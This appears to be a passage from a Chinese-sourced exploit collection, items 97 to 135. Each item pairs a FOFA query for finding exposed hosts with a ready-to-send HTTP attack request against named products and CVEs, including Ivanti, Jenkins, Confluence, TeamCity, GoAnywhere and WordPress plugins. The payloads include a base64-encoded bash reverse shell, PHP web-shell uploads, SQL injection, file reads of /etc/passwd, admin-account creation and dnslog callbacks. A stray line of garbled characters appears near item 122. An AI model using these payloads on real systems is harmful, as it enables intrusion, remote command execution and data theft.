User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


File path: boot/web/upload/weblogo/1.php
1 g+ {- A9 C* ^5 n; ^) s
" X. R/ N( S+ K122. 北京百绰智能s200管理平台/importexport.php sql注入- ^4 P3 _, i7 p. ^
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin backend directly; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
